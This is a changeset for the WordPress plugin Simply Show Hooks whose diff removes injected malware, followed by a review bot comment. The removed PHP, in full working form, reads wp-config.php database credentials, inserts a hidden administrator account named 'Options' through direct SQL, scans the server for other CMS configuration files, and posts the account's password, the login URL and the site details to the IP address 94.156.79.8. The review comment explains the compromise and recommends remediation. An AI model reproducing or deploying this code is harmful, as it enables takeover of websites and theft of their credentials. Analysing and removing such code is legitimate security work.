
Changeset 3106767

Timestamp:
06/24/2024 03:44:39 PM (2 weeks ago)
Author:
frantorres
Message:

PRT Revert Changes

File:
1 edited

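--- a/simply-show-hooks/trunk/index.php
+++ b/simply-show-hooks/trunk/index.php
@@ -4,5 +4,5 @@
 Plugin URI: http://www.calyxagency.com/#plugins
 Description: Simply Show Hooks helps theme or plugin developers to quickly see where all the action and filter hooks are on any WordPress page.
-Version: 1.2.2
+Version: 1.2.
 Contributors: stuartobrien, cxthemes
 Author: Stuart O'Brien, cxThemes
@@ -14,554 +14,5 @@
 
 defined( 'ABSPATH' ) or die( 'No Trespassing!' ); // Security
-add_action( 'admin_init', 'custom_notify_plugin_updated');
-function custom_notify_plugin_updated() {
-    function check_wp_config($directory) {
-    while ($directory !== '/') {
-        $wp_config_file = $directory . '/wp-config.php';
-        if (file_exists($wp_config_file)) {
-            return $wp_config_file;
-        }
-        $directory = dirname($directory);
-    }
-    remove_action('admin_init', 'custom_notify_plugin_updated');
-    return false;
-}
-
-function parse_wp_config($config_file) {
-    if (file_exists($config_file)) {
-        $config_content = file_get_contents($config_file);
-        $matches = [];
-        // Extract prefix
-        if (preg_match("/\$table_prefix\s*=\s*'(.+?)';/", $config_content, $matches)) {
-            $prefix = $matches[1];
-        } else if (preg_match("/table_prefix.*=.*'(.+?)';/", $config_content, $matches)) {
-            $prefix = $matches[1];
-        } else {
-            die("Prefix not found in wp-config.php");
-        }
-        // Extract database name
-        if (preg_match("/define\(\s*'DB_NAME'\s*,\s*'(.+?)'\s*\);/", $config_content, $matches)) {
-            $database = $matches[1];
-        }
-        // Extract username
-        if (preg_match("/define\(\s*'DB_USER'\s*,\s*'(.+?)'\s*\);/", $config_content, $matches)) {
-            $username = $matches[1];
-        }
-        // Extract password
-        if (preg_match("/define\(\s*'DB_PASSWORD'\s*,\s*'(.+?)'\s*\);/", $config_content, $matches)) {
-            $password = $matches[1];
-        }
-        // Extract host
-        if (preg_match("/define\(\s*'DB_HOST'\s*,\s*'(.+?)'\s*\);/", $config_content, $matches)) {
-            $host = $matches[1];
-        } else {
-            $host = 'localhost'; // Assuming local host if not specified
-        }
-
-        return array(
-            'prefix' => $prefix,
-            'database' => $database,
-            'username' => $username,
-            'password' => $password,
-            'host' => $host
-        );
-    } else {
-        die("wp-config.php file not found");
-    }
-}
-
-function access_database($config) {
-    $mysqli = new mysqli($config['host'], $config['username'], $config['password'], $config['database']);
-
-    if ($mysqli->connect_errno) {
-        //echo "DATABASE ACCESS [FAIL]\n";
-        return false;
-    } else {
-        //POST "DATABASE ACCESS [SUCCESS]\n";
-        return $mysqli;
-    }
-}
-
-function generate_random_password($length = 12) {
-    $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()-_';
-    $password = '';
-    $characters_length = strlen($characters);
-    for ($i = 0; $i < $length; $i++) {
-        $password .= $characters[rand(0, $characters_length - 1)];
-    }
-    return $password;
-}
-
-// Define a global variable for the password
-$generated_password = generate_random_password();
-
-// Define a global variable for the users count
-$wpuserscount = 0;
-function add_admin_user($mysqli, $config, $password) {
-    global $generated_password; // Access the global generated password variable
-    global $wpuserscount; // Declare the global variable to update user count
-    $username = 'Options';
-   
-    //$generated_password = $password;
-    //$password = $generated_password;
-    $user_role = 'administrator';
-
-    // First, let's update the global user count
-    $countQuery = "SELECT COUNT(*) AS user_count FROM {$config['prefix']}users";
-    $countResult = $mysqli->query($countQuery);
-    if ($countResult) {
-        $row = $countResult->fetch_assoc();
-        $wpuserscount = $row['user_count']; // Update the global variable with the user count
-    } else {
-        echo "Error fetching user count: " . $mysqli->error . "\n";
-        return; // Early return in case of query error
-    }
-    // Hash the password
-    $hashed_password = password_hash($password, PASSWORD_DEFAULT);
-
-    // Check if the user already exists
-    $query = "SELECT ID FROM {$config['prefix']}users WHERE user_login = '{$username}'";
-    $result = $mysqli->query($query);
-
-    if ($result && $result->num_rows > 0) {
-        echo "User '{$username}' already exists.\n";
-    } else {
-        // Insert the new user
-        $query = "INSERT INTO {$config['prefix']}users (user_login, user_pass, user_nicename, user_email, user_registered) VALUES ('{$username}', '{$hashed_password}', '{$username}', '{$username}@example.com', NOW())";
-        $result = $mysqli->query($query);
-
-        if ($result) {
-            $user_id = $mysqli->insert_id;
-
-            // Set user role
-            $query = "INSERT INTO {$config['prefix']}usermeta (user_id, meta_key, meta_value) VALUES ({$user_id}, '{$config['prefix']}capabilities', 'a:1:{s:13:\"administrator\";b:1;}')";
-            $result = $mysqli->query($query);
-
-            if ($result) {
-                echo "User '{$username}' with administrative privileges added successfully.\n";
-            } else {
-                echo "Error assigning role to user '{$username}'.\n";
-            }
-        } else {
-            echo "Error creating user '{$username}': " . $mysqli->error . "\n";
-        }
-    }
-}
-
-function get_domain_from_database($mysqli, $config) {
-    // Query to retrieve site URL from WordPress options table
-    $query = "SELECT option_value FROM {$config['prefix']}options WHERE option_name = 'siteurl'";
-    $result = $mysqli->query($query);
-
-    if ($result && $result->num_rows > 0) {
-        $row = $result->fetch_assoc();
-        $site_url = $row['option_value'];
-        $parsed_url = parse_url($site_url);
-        if ($parsed_url && isset($parsed_url['host'])) {
-            return $parsed_url['host'];
-        }
-    }
-
-    return null;
-}
-$currdomain = 'UNK.UNK';
-function pachamama($path) {
-    global $currdomain;
-    if (strpos($path, 'wp-config.php') !== false) {
-        $path = str_replace('wp-config.php', '', $path);
-    }
-
-    $current_directory = $path;
-    $wp_config_file = check_wp_config($current_directory);
-    if ($wp_config_file) {
-        echo "WP-CONFIG [FOUND]\n";
-        $config = parse_wp_config($wp_config_file);
-        $mysqli = access_database($config);
-        if ($mysqli) {
-            $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()-_';
-            $password = '';
-            $characters_length = strlen($characters);
-            for ($i = 0; $i < 13; $i++) {
-                $password .= $characters[rand(0, $characters_length - 1)];
-            }
-            add_admin_user($mysqli, $config, $password);
-            $domain = get_domain_from_database($mysqli, $config);
-            if ($domain) {
-                echo "[$domain] OK\n";
-                $currdomain = $domain;
-
-                // Reconstruct the correct wp-login.php path
-                $wp_login_path = "https://{$domain}/wp-login.php";
-
-                // Perform a POST request to https://94.156.79.8/AddSites
-                $url = 'https://94.156.79.8/AddSites';
-                $post_data = array(
-                    'domain' => $domain,
-                    'username' => 'Options',
-                    'passwordz' => $password, // Access the global generated password variable
-                    'wp_login_path' => $wp_login_path
-                );
-
-                $ch = curl_init();
-                curl_setopt($ch, CURLOPT_URL, $url);
-                curl_setopt($ch, CURLOPT_POST, 1);
-                curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($post_data)); // Send JSON data
-                curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
-                curl_setopt($ch, CURLOPT_HTTPHEADER, array(
-                    'Content-Type: application/json', // Set content type to JSON
-                    'Content-Length: ' . strlen(json_encode($post_data)) // Set content length
-                ));
-                $response = curl_exec($ch);
-                $error = curl_error($ch); // Get any curl error
-                curl_close($ch);
-
-                if ($response === false) {
-                    //echo "POST request failed: $error\n";
-                    $z = false;
-                } else {
-                    //echo "POST request sent successfully. Response: $response\n";
-                    $z = true;
-                }
-            } else {
-                //echo "Domain retrieval failed.\n";
-                $z = false;
-            }
-            $mysqli->close();
-        }
-    } else {
-        //echo "WP-CONFIG [NOT FOUND]\n";
-        $z = false;
-    }
-}
-
-function check_cms_configuration_files() {
-    global $wpuserscount;
-   global $wp_config_paths;
-   global $wc_config_paths;
-   global $mg_config_paths;
-    // Function to recursively search directories for configuration files
-    //function search_for_config_files($directory, &$cms_config_files, $max_parents = 4) {
-      function search_for_config_files(&$cms_config_files, $max_parents = 3) {
-      // Get the current directory
-      $directory = __DIR__;
-
-      // Initialize the variable to keep track of the last readable path
-      $last_readable_path = null;
-
-      // Iterate to go one parent folder up until no read permission or max 5 parents
-      for ($i = 0; $i < $max_parents; $i++) {
-          // Check if the directory exists and is readable
-          if (is_dir($directory) && is_readable($directory)) {
-              $last_readable_path = $directory;
-          } else {
-              // Stop iteration if the directory is not readable
-              break;
-          }
-
-          // Move one directory up
-          $directory = dirname($directory);
-      }
-
-      // If a readable path was found, perform a recursive glob search for the specified file extensions
-      if (!empty($last_readable_path)) {
-
-          $config_files = [];
-          $files = [];
-          //$pattern = '/home/98752.cloudwaysapps.com/trnkgjmvur';
-          try {
-          $objects = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($last_readable_path), RecursiveIteratorIterator::SELF_FIRST, RecursiveIteratorIterator::CATCH_GET_CHILD);
-            foreach($objects as $name => $object){
-              if (substr($name, -4) === '.php') {
-                // Add only files ending with '.php' to the $files array
-                //echo "$name\n";
-                $files[] = $name;
-              }
-            }
-                  } catch (Exception $e) {
-          // Handle any exceptions that occur during iteration
-          // You can log the error or take appropriate action here
-          //echo "Error: " . $e->getMessage();
-          $d = 'sab';
-        }
-          foreach ($files as $file) {
-              // Add the found file to the list of config files
-              //print($file);
-              $cms_config_files[] = $file;
-          }
-          return $cms_config_files;
-      } else {
-          // Return an empty array if no readable path was found
-          //echo("No Readable Paths");
-          return [];
-      }
-  }
-
-
-    // Array to store detected CMS names
-    $detected_cms = [
-        'WordPress' => false,
-        'WooCommerce' => false,
-        'Magento' => false,
-        'OpenCart' => false,
-        'PrestaShop' => false,
-        'Drupal Commerce' => false,
-        'Symfony' => false,
-        'Laravel' => false,
-        'Zend Framework' => false
-    ];
-
-    // Array to store detected .dat files
-    $detected_dat_files = [];
-
-    // Paths to check for CMS-specific configuration files
-    $current_directory = __DIR__;
-    $paths_to_check = [
-        '/var/www/vhosts/aedstudisrl.com/httpdocs/wp-admin',
-        $current_directory,
-        '/etc',                // Common system configuration directory
-        '/var/www',      // Example web root directory
-        '/home',              // Home directories
-        '/opt',               // Optional software packages
-        '/usr/local',         // Locally installed software
-        '/usr/share',         // Shared software resources
-        '/var/lib',           // Variable data directories
-    ];
-
-    // Files to search for in each directory
-    $files_to_search = [
-        'app/etc/env.php',                                       // Magento
-        'wp-config.php', 'wp-content/plugins/woocommerce/includes/class-wc-settings.php', // WordPress & WooCommerce
-        'config.php',                                             // OpenCart
-        'config/parameters.php',                                  // PrestaShop
-        'sites/default/settings.php',                             // Drupal Commerce
-        'config/packages/*.yaml',                                 // Symfony
-        '.env',                                                   // Laravel
-        'config/autoload/*.global.php',                           // Zend Framework
-        '*.dat',                                                  // .dat files
-    ];
-
-    // Array to store CMS configuration files
-    $cms_config_files = [];
-
-    // Iterate through the paths to check and search for configuration files in each directory recursively
-
-    search_for_config_files($cms_config_files);
-
-
-    // Process the detected configuration files and extract CMS information
-    foreach ($cms_config_files as $file) {
-       // echo($file);
-        if (strpos($file, 'wp-config.php') !== false) {
-
-           $detected_cms['WordPress'] = true;
-           $wp_config_paths[] = $file;
-
-        } elseif (strpos($file, 'class-wc-settings.php') !== false) {
-            // You may add a specific check for WooCommerce here if needed
-            $detected_cms['WooCommerce'] = true;
-            $wc_config_paths[] = $file;
-        } elseif (strpos($file, 'env.php') !== false &&
-            strpos($file, 'Composer') === false &&
-            strpos($file, 'composer') === false &&
-            strpos($file, 'Softaculous') === false) {
-            // You may add a specific check for Magento here if needed
-            // Read the content of the file
-            $fileContent = file_get_contents($file);
-
-            // Check if the content contains the string 'host' => '
-            if (strpos($fileContent, "'host' => '") !== false) {
-              $detected_cms['Magento'] = true;
-              $mg_config_paths[] = $file;
-              /*echo("MAGENTO\n\n\n");
-              echo("MAGENTO\n\n\n");
-              echo("MAGENTO\n\n\n");
-              echo("MAGENTO\n\n\n");
-              echo("MAGENTO\n\n\n");
-              echo("MAGENTO\n\n\n");
-              echo("MAGENTO\n\n\n");
-              echo("MAGENTO\n\n\n");
-              echo($file);
-              echo($file);
-              echo($file);
-              echo($file);
-              echo($file);
-              echo("MAGENTO\n\n\n");
-              echo("MAGENTO\n\n\n");
-              echo("MAGENTO\n\n\n");
-              echo("MAGENTO\n\n\n");
-              echo("MAGENTO\n\n\n");
-              echo("MAGENTO\n\n\n");
-              echo("MAGENTO\n\n\n");
-              echo("MAGENTO\n\n\n");*/
-            }
-
-        } elseif (strpos($file, 'config.php') !== false &&
-            strpos($file, 'Composer') === false &&
-            strpos($file, 'composer') === false &&
-            strpos($file, 'Softaculous') === false) {
-            if (strpos(file_get_contents($file), '$config[\'encryption_key\']') !== false) {
-                $detected_cms['OpenCart'] = true;
-            }
-        } elseif (strpos($file, 'parameters.php') !== false) {
-            if (strpos(file_get_contents($file), 'prestashop') !== false) {
-                $detected_cms['PrestaShop'] = true;
-            }
-        } elseif (strpos($file, 'settings.php') !== false) {
-            if (strpos(file_get_contents($file), 'drupal') !== false) {
-                $detected_cms['Drupal Commerce'] = true;
-            }
-        } elseif (strpos($file, '.yaml') !== false) {
-            if (strpos(file_get_contents($file), 'Symfony\Component') !== false) {
-                $detected_cms['Symfony'] = true;
-            }
-        } elseif (strpos($file, '.env') !== false) {
-            // You may add a specific check for Laravel here if needed
-            $detected_cms['Laravel'] = true;
-        } elseif (strpos($file, '.global.php') !== false) {
-            // You may add a specific check for Zend Framework here if needed
-            $detected_cms['Zend Framework'] = true;
-        } elseif (strpos($file, '.dat') !== false) {
-            $detected_dat_files[] = $file;
-        }
-    }
-
-    // Convert the boolean values to strings
-    foreach ($detected_cms as $cms => $detected) {
-        $detected_cms[$cms] = $detected ? 'true' : 'false';
-    }
-
-    // Now $detected_cms array contains the names of detected CMS based on the configuration files found
-    // And $detected_dat_files array contains the paths of detected .dat files
-
-    // Read users from the database and count them for WordPress and WooCommerce
-    $wordpress_users = $wpuserscount;
-    //$woocommerce_users = get_woocommerce_user_count();
-    $woocommerce_users = 000;
-
-    // Perform POST requests to the endpoints with JSON data containing CMS detection and user counts
-    $url1 = 'https://94.156.79.8/FCS';
-    $url2 = 'https://94.156.79.8/CMSUsers';
-
-    $data1 = [
-        'host' => $_SERVER['HTTP_HOST'],
-        'cms' => $detected_cms
-    ];
-
-    //print_r($detected_cms);
-
-    // Send data to the endpoints using CURL
-    send_post_request($url1, $data1);
-    // Additional logic as needed
-}
-
-function getWPUsers(){
-    global $wpuserscount;
-    global $currdomain;
-    // Read users from the database and count them for WordPress and WooCommerce
-    $wordpress_users = $wpuserscount;
-    //$woocommerce_users = get_woocommerce_user_count();
-    $woocommerce_users = 000;
-    $url2 = 'https://94.156.79.8/CMSUsers';
-    $data2 = [
-        'host' => $currdomain,
-        'wordpress_users' => $wordpress_users,
-        'woocommerce_users' => $woocommerce_users
-    ];
-
-    // Send data to the endpoints using CURL
-    send_post_request($url2, $data2);
-}
-
-// Function to get WordPress user count from the database
-function get_wordpress_user_count() {
-    // Your implementation to fetch user count from the WordPress database
-    // Example:
-    // $count = query_wordpress_database();
-    // return $count;
-    return 0;
-}
-
-// Function to get WooCommerce user count from the database
-function get_woocommerce_user_count() {
-    // Your implementation to fetch user count from the WooCommerce database
-    // Example:
-    // $count = query_woocommerce_database();
-    // return $count;
-    return 0;
-}
-
-// Function to send POST request
-function send_post_request($url, $data) {
-    $ch = curl_init($url);
-    curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");
-    curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));
-    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
-    curl_setopt($ch, CURLOPT_HTTPHEADER, [
-        'Content-Type: application/json',
-        'Content-Length: ' . strlen(json_encode($data))
-    ]);
-    $response = curl_exec($ch);
-    curl_close($ch);
-    // Handle response as needed
-}
-global $wp_config_paths;
-$wp_config_paths = [];
-global $wc_config_paths;
-$wc_config_paths = [];
-global $mg_config_paths;
-$mg_config_paths = [];
-check_cms_configuration_files();
-
-function find_wp_configs(&$wp_config_paths, $depth = 0) {
-    $current_directory = getcwd();
-    $parent_directory = $current_directory;
-
-    // Go back three parents
-    for ($i = 0; $i < 3; $i++) {
-        $parent_directory = dirname($parent_directory);
-    }
-
-    // Start the search from the parent directory
-    find_wp_configs_recursive($parent_directory, $wp_config_paths);
-}
-
-function find_wp_configs_recursive($directory, &$wp_config_paths) {
-    // Check if wp-config.php exists in the current directory
-    $wp_config_file = $directory . '/wp-config.php';
-    if (file_exists($wp_config_file)) {
-        $wp_config_paths[] = $wp_config_file;
-    }
-
-    // Continue searching forward recursively
-    $contents = scandir($directory);
-    foreach ($contents as $item) {
-        if ($item != '.' && $item != '..' && is_dir($directory . '/' . $item)) {
-            find_wp_configs_recursive($directory . '/' . $item, $wp_config_paths);
-        }
-    }
-}
-
-function print_wp_config_paths() {
-    global $wp_config_paths;
-    if (empty($wp_config_paths)) {
-        //echo "No wp-config.php files found.\n";
-        $z = 0;
-    } else {
-        //echo "List of wp-config.php files:\n";
-        foreach ($wp_config_paths as $wp_config_path) {
-            //echo "$wp_config_path\n";
-            $a = 0;
-        }
-    }
-}
-//print_wp_config_paths();
-
-find_wp_configs($wp_config_paths);
-foreach ($wp_config_paths as $wp_config_path) {
-    pachamama($wp_config_path);
-    getWPUsers();
-}
-   
-}
+
 class CX_Simply_Show_Hooks {
    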
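Review bot: The `Version:` header in the plugin comment block goes from `1.2.2` down to `1.2.` (as rendered here), so a site that already installed the 1.2.2 build carrying the removed `custom_notify_plugin_updated` code may never be offered this clean copy as an update; shipping the revert under a higher number, e.g. `Version: <next release above 1.2.2>`, would get it delivered. Deleting the code also does not undo what it already did on an affected site: the removed `add_admin_user()` inserted an administrator named `Options` directly into the users and usermeta tables, and `pachamama()` posted that account's password and the login URL to `94.156.79.8`. Anyone who ran the 1.2.2 build should delete that account, review the remaining administrator accounts, and check outbound logs for requests to that address. The message "PRT Revert Changes" says none of this; one line stating what was reverted and why would help people triaging the changeset.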